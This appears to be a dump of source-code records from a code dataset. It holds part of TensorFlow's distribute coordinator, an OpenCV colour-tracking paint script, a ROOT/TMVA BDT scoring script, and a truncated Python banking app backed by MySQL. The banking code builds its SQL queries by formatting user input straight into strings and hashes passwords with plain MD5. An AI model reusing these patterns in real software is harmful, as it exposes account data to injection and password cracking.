cluster_spec.jobs:\n eval_thread = threading.Thread(\n target=_run_single_worker,\n args=(eval_fn, eval_strategy, cluster_spec, _TaskType.EVALUATOR, 0,\n session_config),\n kwargs={\n \"rpc_layer\": rpc_layer,\n \"coord\": coord,\n })\n eval_thread.start()\n\n worker_result = _run_single_worker(\n worker_fn,\n strategy,\n cluster_spec,\n None,\n None,\n session_config,\n rpc_layer=rpc_layer,\n coord=coord)\n\n if eval_thread:\n coord.join([eval_thread])\n\n return worker_result\n\n\ndef _configure_session_config_for_std_servers(\n strategy, eval_strategy, session_config, cluster_spec, task_type, task_id):\n # pylint: disable=g-doc-args\n \"\"\"Call strategy's `configure` to mutate the session_config.\n\n The session_config is currently needed as default config for a TensorFlow\n server. In the future, we should be able to remove this method and only pass\n the session config to a client session.\n \"\"\"\n if task_type == _TaskType.EVALUATOR:\n if eval_strategy:\n eval_strategy.configure(session_config=session_config)\n else:\n # The strategy may be shared in standalone client mode.\n strategy = copy.deepcopy(strategy)\n strategy.configure(\n session_config=session_config,\n cluster_spec=cluster_spec,\n task_type=task_type,\n task_id=task_id)\n # Remove the device filters specific to the strategy, so that the\n # TensorFlow server brought up with one strategy can be used by other\n # strategies. The device filters can be set in the client side as well.\n del session_config.device_filters[:]\n\n\ndef run_standard_tensorflow_server(session_config=None):\n \"\"\"Starts a standard TensorFlow server.\n\n This method parses configurations from \"TF_CONFIG\" environment variable and\n starts a TensorFlow server. The \"TF_CONFIG\" is typically a json string and\n must have information of the cluster and the role of the server in the\n cluster. One example is:\n\n TF_CONFIG='{\n \"cluster\": {\n \"worker\": [\"host1:2222\", \"host2:2222\", \"host3:2222\"],\n \"ps\": [\"host4:2222\", \"host5:2222\"]\n },\n \"task\": {\"type\": \"worker\", \"index\": 1}\n }'\n\n This \"TF_CONFIG\" specifies there are 3 workers and 2 ps tasks in the cluster\n and the current role is worker 1.\n\n Valid task types are \"chief\", \"worker\", \"ps\" and \"evaluator\" and you can have\n at most one \"chief\" and at most one \"evaluator\".\n\n An optional key-value can be specified is \"rpc_layer\". The default value is\n \"grpc\".\n\n Args:\n session_config: an optional `tf.compat.v1.ConfigProto` object. Users can\n pass in the session config object to configure server-local devices.\n\n Returns:\n a `tf.distribute.Server` object which has already been started.\n\n Raises:\n ValueError: if the \"TF_CONFIG\" environment is not complete.\n \"\"\"\n tf_config = json.loads(os.environ.get(\"TF_CONFIG\", \"{}\"))\n if \"cluster\" not in tf_config:\n raise ValueError(\"\\\"cluster\\\" is not found in TF_CONFIG.\")\n cluster_spec = multi_worker_util.normalize_cluster_spec(tf_config[\"cluster\"])\n if \"task\" not in tf_config:\n raise ValueError(\"\\\"task\\\" is not found in TF_CONFIG.\")\n task_env = tf_config[\"task\"]\n if \"type\" not in task_env:\n raise ValueError(\n \"\\\"task_type\\\" is not found in the `task` part of TF_CONFIG.\")\n task_type = task_env[\"type\"]\n task_id = int(task_env.get(\"index\", 0))\n\n rpc_layer = tf_config.get(\"rpc_layer\", \"grpc\")\n\n session_config = session_config or config_pb2.ConfigProto()\n # Set the collective group leader for collective ops to initialize collective\n # ops when server starts.\n if \"chief\" in cluster_spec.jobs:\n session_config.experimental.collective_group_leader = (\n \"/job:chief/replica:0/task:0\")\n else:\n if \"worker\" not in cluster_spec.jobs:\n raise ValueError(\n \"You must have `chief` or `worker` jobs in the `cluster_spec`.\")\n session_config.experimental.collective_group_leader = (\n \"/job:worker/replica:0/task:0\")\n\n server = _run_std_server(\n cluster_spec=cluster_spec,\n task_type=task_type,\n task_id=task_id,\n session_config=session_config,\n rpc_layer=rpc_layer)\n server.start()\n return server\n\n\n# TODO(yuefengz): propagate cluster_spec in the STANDALONE_CLIENT mode.\n# TODO(yuefengz): we may need a smart way to figure out whether the current task\n# is the special task when we support cluster_spec propagation.\ndef run_distribute_coordinator(worker_fn,\n strategy,\n eval_fn=None,\n eval_strategy=None,\n mode=CoordinatorMode.STANDALONE_CLIENT,\n cluster_spec=None,\n task_type=None,\n task_id=None,\n session_config=None,\n rpc_layer=\"grpc\"):\n \"\"\"Runs the coordinator for distributed TensorFlow.\n\n This function runs a split coordinator for distributed TensorFlow in its\n default mode, i.e the STANDALONE_CLIENT mode. Given a `cluster_spec`\n specifying server addresses and their roles in a cluster, this coordinator\n will figure out how to set them up, give the underlying function the right\n targets for master sessions via a scope object and coordinate their training.\n The cluster consisting of standard servers needs to be brought up either with\n the standard server binary or with a binary running distribute coordinator\n with `task_type` set to non-client type which will then turn into standard\n servers.\n\n In addition to be the distribute coordinator, this is also the source of\n configurations for each job in the distributed training. As there are multiple\n ways to configure a distributed TensorFlow cluster, its context object\n provides these configurations so that users or higher-level APIs don't have to\n figure out the configuration for each job by themselves.\n\n In the between-graph replicated training, this coordinator will create\n multiple threads and each calls the `worker_fn` which is supposed to create\n its own graph and connect to one worker master given by its context object. In\n the in-graph replicated training, it has only one thread calling this\n `worker_fn`.\n\n Another mode is the INDEPENDENT_WORKER mode where each server runs a\n distribute coordinator which will start a standard server and optionally runs\n `worker_fn` depending whether it is between-graph training or in-graph\n replicated training.\n\n The `strategy` object is expected to be a DistributionStrategy object which\n has implemented methods needed by distributed coordinator such as\n `configure(session_config, cluster_spec, task_type, task_id)` which configures\n the strategy object for a specific task and `experimental_should_init`\n property which instructs the distribute coordinator whether to run init ops\n for a task. The distribute coordinator will make a copy of the `strategy`\n object, call its `configure` method and pass it to `worker_fn` as an argument.\n\n The `worker_fn` defines the training logic and is called under its own\n worker context which can be accessed to via `get_current_worker_context`. A\n worker context provides access to configurations for each task, e.g. the\n task_type, task_id, master target and so on. Since `worker_fn` will be called\n in a thread and possibly multiple times, caller should be careful when it\n accesses global data. For example, it is unsafe to define flags in a\n `worker_fn` or to define different environment variables for different\n `worker_fn`s.\n\n The `worker_fn` for the between-graph replication is defined as if there is\n only one worker corresponding to the `worker_fn` and possibly ps jobs. For\n example, when training with parameter servers, it assigns variables to\n parameter servers and all other operations to that worker. In the in-graph\n replication case, the `worker_fn` has to define operations for all worker\n jobs. Using a distribution strategy can simplify the `worker_fn` by not having\n to worry about the replication and device assignment of variables and\n operations.\n\n This method is intended to be invoked by high-level APIs so that users don't\n have to explicitly call it to run this coordinator. For those who don't use\n high-level APIs, to change a program to use this coordinator, wrap everything\n in a the program after global data definitions such as commandline flag\n definition into the `worker_fn` and get task-specific configurations from\n the worker context.\n\n The `cluster_spec` can be either passed by the argument or parsed from the\n \"TF_CONFIG\" environment variable. Example of a TF_CONFIG:\n ```\n cluster = {'chief': ['host0:2222'],\n 'ps': ['host1:2222', 'host2:2222'],\n 'worker': ['host3:2222', 'host4:2222', 'host5:2222']}\n os.environ['TF_CONFIG'] = json.dumps({'cluster': cluster})\n ```\n\n If `cluster_spec` is not given in any format, it becomes local training and\n this coordinator will connect to a local session.\n\n For evaluation, if \"evaluator\" exists in the cluster_spec, a separate thread\n will be created to call `eval_fn` with its `task_type` set to \"evaluator\". If\n `eval_fn` is not defined, fall back to `worker_fn`. This implies that\n evaluation will be done on a single machine if there is an \"evaluator\" task.\n If \"evaluator\" doesn't exist in the cluster_spec, it entirely depends on the\n `worker_fn` for how to do evaluation.\n\n Args:\n worker_fn: the function to be called. The function should accept a\n `strategy` object and will be given access to a context object via a\n context manager scope.\n strategy: a DistributionStrategy object specifying whether it should\n run between-graph replicated training or not, whether to run init ops,\n etc. This object will also be configured given `session_config`,\n `cluster_spec`, `task_type` and `task_id`.\n eval_fn: optional function for \"evaluator\" task. If `eval_fn` is not passed\n in but a \"evaluator\" task is found in the `cluster_spec`, the `worker_fn`\n will be used for this task.\n eval_strategy: optional DistributionStrategy object for \"evaluator\" task.\n mode: in which mode this distribute coordinator runs.\n cluster_spec: a dict, ClusterDef or ClusterSpec specifying servers and roles\n in a cluster. If not set or empty, fall back to local training.\n task_type: the current task type, optional if this is a client.\n task_id: the current task id, optional if this is a client.\n session_config: an optional `tf.compat.v1.ConfigProto` object which will be\n passed to `strategy`'s `configure` method and used to create a session.\n rpc_layer: optional string, the protocol for RPC, e.g. \"grpc\".\n\n Raises:\n ValueError: if `cluster_spec` is supplied but not a dict or a ClusterDef or\n a ClusterSpec.\n\n Returns:\n In the client job, return the value returned by `worker_fn` if\n it is in-graph replication or INDEPENDENT_WORKER mode; return None\n otherwise.\n \"\"\"\n tf_config = json.loads(os.environ.get(\"TF_CONFIG\", \"{}\"))\n rpc_layer = tf_config.get(\"rpc_layer\", rpc_layer)\n environment = tf_config.get(\"environment\", None)\n\n if not cluster_spec:\n cluster_spec = tf_config.get(\"cluster\", {})\n task_env = tf_config.get(\"task\", {})\n if task_env:\n task_type = task_env.get(\"type\", task_type)\n task_id = int(task_env.get(\"index\", task_id))\n\n if cluster_spec:\n # TODO(yuefengz): validate cluster_spec.\n cluster_spec = multi_worker_util.normalize_cluster_spec(cluster_spec)\n elif hasattr(strategy.extended, \"_cluster_resolver\"):\n cluster_resolver = strategy.extended._cluster_resolver # pylint: disable=protected-access\n task_type = cluster_resolver.task_type\n task_id = cluster_resolver.task_id\n rpc_layer = cluster_resolver.rpc_layer or rpc_layer\n environment = cluster_resolver.environment\n cluster_spec = cluster_resolver.cluster_spec()\n\n # Setting the session config is necessary for some strategies such as\n # CollectiveAllReduceStrategy.\n session_config = session_config or config_pb2.ConfigProto(\n allow_soft_placement=True)\n\n if cluster_spec:\n logging.info(\n \"Running Distribute Coordinator with mode = %r, cluster_spec = %r, \"\n \"task_type = %r, task_id = %r, environment = %r, rpc_layer = %r\", mode,\n cluster_spec.as_dict(), task_type, task_id, environment, rpc_layer)\n\n if not cluster_spec:\n # `mode` is ignored in the local case.\n logging.info(\"Running local Distribute Coordinator.\")\n _run_single_worker(worker_fn, strategy, None, None, None, session_config,\n rpc_layer)\n if eval_fn:\n _run_single_worker(eval_fn, eval_strategy, None, None, None,\n session_config, rpc_layer)\n else:\n logging.warning(\"Skipped evaluation since `eval_fn` is not passed in.\")\n elif mode == CoordinatorMode.STANDALONE_CLIENT:\n if not eval_fn:\n logging.warning(\"`eval_fn` is not passed in. The `worker_fn` will be \"\n \"used if an \\\"evaluator\\\" task exists in the cluster.\")\n eval_fn = eval_fn or worker_fn\n if not eval_strategy:\n logging.warning(\"`eval_strategy` is not passed in. No distribution \"\n \"strategy will be used for evaluation.\")\n\n # The client must know the cluster but servers in the cluster don't have to\n # know the client.\n if task_type in [_TaskType.CLIENT, None]:\n if strategy.extended.experimental_between_graph:\n return _run_between_graph_client(worker_fn, strategy, eval_fn,\n eval_strategy, cluster_spec,\n session_config, rpc_layer)\n else:\n return _run_in_graph_client(worker_fn, strategy, eval_fn, eval_strategy,\n cluster_spec, session_config, rpc_layer)\n else:\n # If not a client job, run the standard server.\n _configure_session_config_for_std_servers(strategy, eval_strategy,\n session_config, cluster_spec,\n task_type, task_id)\n server = _run_std_server(\n cluster_spec=cluster_spec,\n task_type=task_type,\n task_id=task_id,\n session_config=session_config,\n rpc_layer=rpc_layer,\n environment=environment)\n server.join()\n else:\n if mode != CoordinatorMode.INDEPENDENT_WORKER:\n raise ValueError(\"Unexpected coordinator mode: %r\" % mode)\n\n if not eval_fn:\n logging.warning(\"`eval_fn` is not passed in. The `worker_fn` will be \"\n \"used if an \\\"evaluator\\\" task exists in the cluster.\")\n eval_fn = eval_fn or worker_fn\n if not eval_strategy:\n logging.warning(\"`eval_strategy` is not passed in. No distribution \"\n \"strategy will be used for evaluation.\")\n\n # Every one starts a standard server, get session config from `configure`\n # method.\n _configure_session_config_for_std_servers(strategy, eval_strategy,\n session_config, cluster_spec,\n task_type, task_id)\n\n if (task_type != _TaskType.EVALUATOR and\n not getattr(strategy.extended, \"_std_server_started\", False)):\n # Right now, with eager mode, context is configured with a std server at\n # the very beginning while with graph mode the std server is started when\n # distribute coordinator is called. We should consolidate these two paths.\n server = _run_std_server(\n cluster_spec=cluster_spec,\n task_type=task_type,\n task_id=task_id,\n session_config=session_config,\n rpc_layer=rpc_layer,\n environment=environment)\n if task_type in [_TaskType.CHIEF, _TaskType.WORKER]:\n if strategy.extended.experimental_between_graph:\n # All jobs run `worker_fn` if between-graph.\n return _run_single_worker(worker_fn, strategy, cluster_spec, task_type,\n task_id, session_config, rpc_layer)\n else:\n # Only one node runs `worker_fn` if in-graph.\n context = _WorkerContext(strategy, cluster_spec, task_type, task_id)\n if context.is_chief:\n return _run_single_worker(worker_fn, strategy, cluster_spec, None,\n None, session_config, rpc_layer)\n else:\n server.join()\n elif task_type == _TaskType.EVALUATOR:\n return _run_single_worker(eval_fn, eval_strategy, cluster_spec, task_type,\n task_id, session_config, rpc_layer)\n else:\n if task_type != _TaskType.PS:\n raise ValueError(\"Unexpected task_type: %r\" % task_type)\n server.join()\n","sub_path":"tensorflow/python/distribute/distribute_coordinator.py","file_name":"distribute_coordinator.py","file_ext":"py","file_size_in_byte":34550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"165687630","text":"import cv2 as cv\nimport numpy as np\n######################################################\nframeWidth = 640\nframeHeight = 480\n######################################################\ncapture = cv.VideoCapture(1)\ncapture.set(3,frameWidth)\ncapture.set(4,frameHeight)\ncapture.set(10,150)\n\ncolors = [[0,118,226,179,255,255],\n [92,159,156,179,245,255],\n [0,36,178,88,255,255]]\nmycolorValues = [[51,153,255],[255,0,255],[0,255,0]]\n\nmyPoints = []\ndef getContours(img):\n contours,hierarchy = cv.findContours(img,cv.RETR_EXTERNAL,cv.CHAIN_APPROX_NONE)\n x,y,w,h = 0,0,0,0\n for cnt in contours:\n area = cv.contourArea(cnt)\n if area > 500:\n # cv.drawContours(imgResult,cnt,-1,(255,0,0),3)\n perimeter = cv.arcLength(cnt,True)\n approx = cv.approxPolyDP(cnt,0.02*perimeter,True)\n x,y,w,h = cv.boundingRect(approx)\n return x+w//2,y\n\ndef findColor(img,colors,mycolorValues):\n imgHSV = cv.cvtColor(img,cv.COLOR_BGR2HSV)\n count = 0\n new_points = []\n for color in colors:\n lower = np.array([color[0:3]])\n high = np.array([color[3:6]])\n mask = cv.inRange(imgHSV,lower,high)\n x,y = getContours(mask)\n cv.circle(imgResult,(x,y),10,mycolorValues[count],cv.FILLED)\n if x != 0 and y!=0:\n new_points.append([x,y,count])\n count+=1\n return new_points\n # cv.imshow(str(color[1]),mask)\n\n\ndef drawOnCanvas(myPoints,mycolorValues):\n for point in myPoints:\n cv.circle(imgResult,(point[0],point[1]),10,mycolorValues[point[2]],cv.FILLED)\n\nwhile True:\n success,img = capture.read()\n imgResult = img.copy()\n new_points = findColor(img,colors,mycolorValues)\n if len(new_points)!=0:\n for newP in new_points:\n myPoints.append(newP)\n if len(myPoints)!=0:\n drawOnCanvas(myPoints,mycolorValues)\n cv.imshow(\"Result\",imgResult)\n if cv.waitKey(1) & 0xFF == ord('q'):\n break","sub_path":"ComputerVision/virtualpaint.py","file_name":"virtualpaint.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"613490836","text":"#from __future__ import print_function\n#!/usr/bin/env python\nimport os, sys\nfrom ROOT import *\nfrom array import array\nimport numpy as np\nfrom training.variables import input_variables_bdt, input_selected_bdt, train_files, evalScale, evalFrac\n\nTMVA.Tools.Instance()\n\n#Channel and version\nif len(sys.argv) < 7:\n print(\"Not enough arguements: Ch, JetCat, Ver, Era, Syst. var, Model\")\n sys.exit()\nch = sys.argv[1]\njetcat = sys.argv[2]\nver = sys.argv[3]\nera = sys.argv[4]\nfile_path = sys.argv[5]\nname = sys.argv[6]\n\nall_features = True\n\nnjets_cut = int(jetcat[1:2]) #Must be jXbX\nif njets_cut not in [3,4]:\n print(\"Check jet category\")\n sys.exit()\nif len(jetcat) > 3:\n nbjets_cut = int(jetcat[3:4])\n if nbjets_cut not in [2,3,4]:\n print(\"Check b jet category\")\n sys.exit()\nelse: nbjets_cut = 0\n\n#directory name\n#rootDir = 'mkNtuple/' + era + '/root_'\nrootDir = '/data1/users/minerva1993/work/'\nif era == '2017': rootDir = rootDir + 'fcnc_RunII2017/finalMVA/current_ver/root_'\nelif era == '2018': rootDir = rootDir + 'fcnc_RunII2018/finalMVA/current_ver/root_'\nconfigDir = './'\nweightDir = 'training/' + era + '/final' + '_' + ch + '_' +jetcat + '_'\nscoreDir = era + '/' + ch + '_' +jetcat + '_'\n\n# Load data\n#syst = [\"\",\"jecup\",\"jecdown\",\"jerup\",\"jerdown\"]\nsyst = [\"\",\"jecAbsoluteup\",\"jecAbsolutedown\", \"jecAbsolute\"+era+\"up\", \"jecAbsolute\"+era+\"down\",\n \"jecBBEC1up\", \"jecBBEC1down\", \"jecBBEC1\"+era+\"up\", \"jecBBEC1\"+era+\"down\",\n \"jecFlavorQCDup\", \"jecFlavorQCDdown\", \"jecRelativeBalup\", \"jecRelativeBaldown\",\n \"jecRelativeSample\"+era+\"up\", \"jecRelativeSample\"+era+\"down\",\n \"jerup\",\"jerdown\"]\nsyst2 = [\"TuneCP5up\",\"TuneCP5down\",\"hdampup\",\"hdampdown\"] #dedecative samples exist\n\n#For now, toggle by hand between selected and all vars\ninput_features = []\nif all_features: input_features.extend(input_variables_bdt(jetcat))\nelse:\n try: input_features.extend(input_selected_bdt(ch, jetcat, era))\n except: input_features.extend(input_variables_bdt(jetcat))\n#input_features.remove('STTT')\n#input_features.remove('channel')\n\nfor syst_ext in syst + syst2:\n if syst_ext != \"\" and not os.path.exists(os.path.join(configDir, scoreDir + ver + \"-\" + syst_ext)):\n try: os.makedirs(os.path.join(configDir, scoreDir + ver + \"-\" + syst_ext))\n except: pass\n elif syst_ext == \"\" and not os.path.exists(os.path.join(configDir, scoreDir + ver) ):\n try: os.makedirs(os.path.join(configDir, scoreDir + ver))\n except: pass\n\n if (\"Run201\" in name) and syst_ext != \"\": continue\n elif (syst_ext in syst2) and not (syst_ext in name): continue\n elif (syst_ext in syst) and any(tmp in name for tmp in syst2): continue\n else:\n if (syst_ext in syst2): name = name.replace(syst_ext,\"\")\n\n if os.path.exists(os.path.join(configDir, scoreDir + ver + syst_ext, 'score_finalMVA_' + name)):\n print(scoreDir + ver + \"/score_finalMVA_\" + name + (' is already exist!').rjust(50-len(name)))\n continue\n\n reader = TMVA.Reader(\"Color:!Silent\")\n if not os.path.exists(os.path.join(rootDir + syst_ext, 'finalMVA_'+name+'.root')): continue\n data = TFile(os.path.join(rootDir + syst_ext, 'finalMVA_'+name+'.root'))\n data_tree = data.Get('tree')\n\n if syst_ext != \"\": syst_ext2 = \"-\"+syst_ext\n else: syst_ext2 = syst_ext\n outfile = TFile.Open(os.path.join(configDir, scoreDir + ver + syst_ext2, 'score_finalMVA_' + name + '.root'),'RECREATE')\n outtree = TTree(\"tree\",\"tree\")\n\n branches = {}\n for branch in data_tree.GetListOfBranches():\n branchName = branch.GetName()\n if branchName in input_features:\n branches[branchName] = array('f', [-999])\n reader.AddVariable(branchName, branches[branchName])\n data_tree.SetBranchAddress(branchName, branches[branchName])\n\n elif branchName in [\"EventCategory\", \"njets\", \"nbjets_m\"]:\n branches[branchName] = array('f', [-999])\n reader.AddSpectator(branchName, branches[branchName])\n\n reader.BookMVA('BDT', TString(os.path.join(configDir, weightDir+ver, 'weights/TMVAClassification_BDT.weights.xml')))\n\n totalevt = data_tree.GetEntries()\n #print(\"this sample contains \"+str(totalevt)+\" combinations\")\n\n score = np.zeros(1, dtype=np.float32)\n nevt = np.zeros(1, dtype=int)\n njets = np.zeros(1, dtype=int)\n nbjets_m = np.zeros(1, dtype=int)\n EventCategory = np.zeros(1, dtype=int)\n lepPt = np.zeros(1, dtype=np.float32)\n missinget = np.zeros(1, dtype=np.float32)\n score_stfcnc = np.zeros(1, dtype=np.float32)\n score_ttfcnc = np.zeros(1, dtype=np.float32)\n score_ttbkg = np.zeros(1, dtype=np.float32)\n\n outtree.Branch('MLScore' , score , 'MLScore/F')\n outtree.Branch('nevt' , nevt , 'nevt/I')\n outtree.Branch('njets' , njets , 'njets/I')\n outtree.Branch('nbjets_m' , nbjets_m , 'nbjets_m/I')\n outtree.Branch('EventCategory', EventCategory, 'EventCategory/I')\n outtree.Branch('lepPt' , lepPt , 'lepPt/F')\n outtree.Branch('missinget' , missinget , 'missinget/F')\n outtree.Branch('score_stfcnc' , score_stfcnc , 'score_stfcnc/F')\n outtree.Branch('score_ttfcnc' , score_ttfcnc , 'score_ttfcnc/F')\n outtree.Branch('score_ttbkg' , score_ttbkg , 'score_ttbkg/F')\n\n for i in xrange(totalevt):\n data_tree.GetEntry(i)\n Nevt = data_tree.nevt\n\n if njets_cut == 3:\n if data_tree.njets != njets_cut: continue\n elif njets_cut == 4:\n if data_tree.njets < njets_cut: continue\n if nbjets_cut != 0:\n if data_tree.nbjets_m != nbjets_cut: continue\n\n score[0] = reader.EvaluateMVA('BDT')\n nevt[0] = data_tree.nevt\n njets[0] = data_tree.njets\n nbjets_m[0] = data_tree.nbjets_m\n EventCategory[0] = data_tree.EventCategory\n lepPt[0] = data_tree.lepton_pt\n missinget[0] = data_tree.MET\n\n if data_tree.njets == 3:\n score_stfcnc[0] = data_tree.stfcnc_score\n score_ttfcnc[0] = -1.0\n score_ttbkg[0] = -1.0\n else:\n score_stfcnc[0] = data_tree.stfcnc_score\n score_ttfcnc[0] = data_tree.ttfcnc_score\n score_ttbkg[0] = data_tree.ttbkg_score\n outtree.Fill()\n #print('processing '+str(Nevt)+'th event', end='\\r')\n\n score[0] = -1\n nevt[0] = 0\n njets[0] = 0\n nbjets_m[0] = 0\n EventCategory[0] = 0\n lepPt[0] = 0\n missinget[0] = 0\n score_stfcnc[0] = -1.0\n score_ttfcnc[0] = -1.0\n score_ttbkg[0] = -1.0\n outtree.Fill()\n\n outfile.Write()\n outfile.Close()\n","sub_path":"finalMVA/evaluation_bdt.py","file_name":"evaluation_bdt.py","file_ext":"py","file_size_in_byte":6451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"574823058","text":"import mysql.connector as mysql\nimport datetime\nfrom pessoa import Pessoa\nfrom cliente import Cliente\nfrom conta import Conta\nfrom conexaoBD import ConexaoBD\n\nclass Registros:\n\t__slots__ = ['_clientes','_contas', '_bd']\n\t\n\tdef __init__(self):\n\t\tself._clientes = []\n\t\tself._contas = []\n\t\tself._bd = ConexaoBD()\n\n\t@property\n\tdef clientes(self):\n\t\treturn self._clientes\n\n\t@property\n\tdef contas(self):\n\t\treturn self._contas\n\n\t@property\n\tdef bd(self):\n\t\treturn self._bd\n\n\t# -----------------------BUSCAS-------------------------- #\n\n\t# Função que inicializa a classe cliente;\n\tdef montaCLIENTE(self, aux):\n\t\tencontrado = None\n\t\tif( len(aux) > 0 ):\n\t\t\t# nome, sobrenome, cpf, email, telefone\n\t\t\t# print(aux)\n\t\t\tencontrado = Cliente(Pessoa(aux[0][1], aux[0][2], aux[0][0], aux[0][3], aux[0][4]), aux[0][5])\n\t\t\t# print(\"encontrado = {encontrado}\")\n\t\treturn encontrado\n\n\t# Função que busca um cliente pelo o CPF.\n\tdef buscaCLIENTE(self,cpf):\n\t\t#print(\"buscaCLIENTE(...)\")\n\t\tsql = (\"SELECT * FROM cliente WHERE cpf = '%s'\" %(cpf))\n\t\taux = self.bd.executaSELECT(sql)\n\t\tencontrado = self.montaCLIENTE(aux)\n\t\treturn encontrado\n\n\t# Função que inicializa a classe conta;\n\tdef montaCONTA(self,aux):\n\t\tencontrado = None\n\t\t# print(aux)\n\t\tif(len(aux) > 0 ):\n\t\t\t# nome, sobrenome, cpf, email, telefone\n\t\t\t# print(f\"montaCONTA aux[0][1] = {aux[0][1]}\")\n\t\t\tcliente = self.buscaCLIENTE(aux[0][1])\n\t\t\tencontrado = Conta(aux[0][0],cliente,aux[0][2],aux[0][3],aux[0][4])\n\t\t\t# print(f\"encontrado em conta = {encontrado}\")\n\t\treturn encontrado\n\n\t# Verifica se já possui uma conta com o número buscado...\n\tdef buscaCONTA(self,cpf):\n\t\tsql = (\"SELECT * FROM conta WHERE cpf_cliente = '%s'\"%(cpf))\n\t\taux = self.bd.executaSELECT(sql)\n\t\tencontrado = self.montaCONTA(aux)\n\t\treturn encontrado\n\n\n\n\t# Busca um conta pelo o CPF:\n\tdef buscaCONTA_num(self,num):\n\t\tsql = (\"SELECT * FROM conta WHERE numero = '%s'\"%(num))\n\t\taux = self.bd.executaSELECT(sql)\n\t\tencontrado = self.montaCONTA(aux)\n\t\treturn encontrado\n\n\t# --------------------------------------------------------------------- #\n\t# Retorna uma lista contendo:\n\t# Retorna o usuário caso seja digitado os dados corretamente, caso contrário retorna retorna None;\n\t# Junto com o usuário ou None é retornado uma mensagem.\n\tdef fazerLOGIN(self, num, senha):\n\n\t\tlogado = []\n\n\t\tif num != '' and senha != '':\n\t\t\t# todos os campos foram preenchidos\n\t\t\t\n\t\t\tconta = self.buscaCONTA_num(num) # busca o usuário na lista de funcionarios cadastrados.\n\t\t\t#print(f\"conta login = {conta}\")\n\n\t\t\tsql = (\"SELECT * FROM conta WHERE numero = '%s' AND senha = MD5('%s')\" %(num,senha))\n\t\t\tAqui = self.bd.executaSELECT(sql)\n\t\t\tconta = self.montaCONTA(Aqui)\n\t\t\tif(conta != None):\n # Funcionário existe!\n\t\t\t\tmensagem = (f\"Bem vindo, {conta.titular.nome}!\")\n\t\t\t\tlogado.append(conta)\n \n\t\t\telse:\n\t\t\t\t# O funcionário não existe.\n\t\t\t\tmensagem = \"Conta não encontrada ou senha incorreta. \\nPor favor, efetue o cadastro antes do login.\"\n\t\telse:\n\t\t\tmensagem = \"Todos os valores devem ser preenchidos!\"\n\n\t\tif( len(logado) == 0 ):\n\t\t\tlogado.append(None)\n \t\n\t\tlogado.append(mensagem)\n\n\t\treturn logado\n\n\n\t# Função que verifica se não há CPFs repetidos e cria um objeto pessoa:\n\tdef cadastrarCLIENTE(self,nome,sobrenome,cpf,email,tel):\n\t\tretorno = []\n\t\tif '' in [nome,sobrenome,cpf,email,tel]:\n\t\t\t# Algum dos valores não foi preenchido.\n\t\t\tmensagem = \"Todos os valores devem ser preenchidos!\"\n\t\telse:\n\t\t\tif self.buscaCLIENTE(cpf) != None:\n\t\t\t\t# Existe um produto já cadastrado com o mesmo código\n\t\t\t\tmensagem = \"O CPF informado já foi cadastrado!\"\n\t\t\telse:\n\t\t\t\tp = Pessoa(nome,sobrenome,cpf,email,tel)\n\t\t\t\ts = \"Não\"\n\t\t\t\tsql = (\"INSERT INTO cliente(cpf,nome,sobrenome,email,telefone,possui_conta) VALUES ('%s','%s','%s','%s','%s','%s')\" %(cpf,nome,sobrenome,email,tel,s))\n\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\tc = Cliente(p)\n\t\t\t\tself.clientes.append(c)\n\t\t\t\tmensagem = \"Cadastro do cliente realizado com sucesso!\"\n\t\t\t\tretorno.append(c)\n\t\t\n\t\tif len(retorno) == 0:\n\t\t\tretorno.append(None) # Houve um erro e o cliente não pôde ser cadastrado.\n\t\tretorno.append(mensagem)\t\n\t\treturn retorno\n\n\t# ---------------------------------------------------- #\n\n\t# Cadastra uma nova conta;\n\tdef cadastrarCONTA(self,numero,cpf,limite,senha,confirmSENHA):\n\t\t# print(\"cadastrarCONTA\")\n\t\tretorno = []\n\t\terros = 1\n\t\t#print('cadastrarCONTA(...)')\n\t\t#print(f\"Valores = {[numero, cpf, limite, senha, confirmSENHA]}\")\n\t\tif '' in [numero, cpf, limite, senha, confirmSENHA]:\n\t\t\t# Algum dos valores não foi preenchido.\n\t\t\tmensagem = \"Todos os valores devem ser preenchidos!\"\n\t\telse:\n\t\t\tc = self.buscaCLIENTE(cpf)\n\t\t\t#print(\"Chegou aqui *\")\n\t\t\tlimite2 = float(limite)\n\t\t\tif c.possuiCONTA == 'Sim':\n\t\t\t\t# O cliente selecionado já possui uma conta.\n\t\t\t\tmensagem = \"Este CPF já possui uma conta!\"\n\t\t\telse:\n\t\t\t\tif senha != confirmSENHA:\n\t\t\t\t\t# A senha e confirmSENHA não foram digitadas corretamente.\n\t\t\t\t\tmensagem = \"Senha e confirmação da senha digitadas INCORRETAMENTE!\"\n\t\t\t\telse:\n\t\t\t\t\tif limite2 < 20.00 or limite2 > 1000.00:\n\t\t\t\t\t\t# Limite não aceito. Não vamos aceitar um valor maior que 200 pois não confiamos. (Banco pequeno.)\n\t\t\t\t\t\tmensagem = \"Limite com valor não aceito.\"\n\t\t\t\t\telse:\n\t\t\t\t\t\t\n\t\t\t\t\t\t# Sem problemas, pode cadastrar normalmente.\n\t\t\t\t\t\t# print('Chegou aqui no cadastro de conta.')\n\t\t\t\t\t\tconta_nova = Conta(numero,c,0,limite2,senha)\n\t\t\t\t\t\t#print(\"Chegou aqui *\")\n\t\t\t\t\t\t#self.contas.append(conta_nova)\n\t\t\t\t\t\tsql = (\"INSERT INTO conta(numero,cpf_cliente,saldo,limite,senha) VALUES ('%s','%s','%f','%f',MD5('%s'))\" %(numero,c.cpf,conta_nova.saldo,limite2,senha))\n\t\t\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\t\t\tc.possuiCONTA = 'Sim'\n\t\t\t\t\t\tdata = datetime.date.today()\n\t\t\t\t\t\tinfo= (\"Criação da conta realizada.\")\n\t\t\t\t\t\tsql = (\"INSERT INTO historico(conta_num,data,descricao) VALUES ('%s','%s','%s')\" %(numero,data,info))\n\t\t\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\t\t\tsql = (\"UPDATE cliente SET possui_conta = '%s' WHERE cpf = '%s'\" %(\"Sim\",c.cpf))\n\t\t\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\t\t\tmensagem = \"Cadastro realizado com 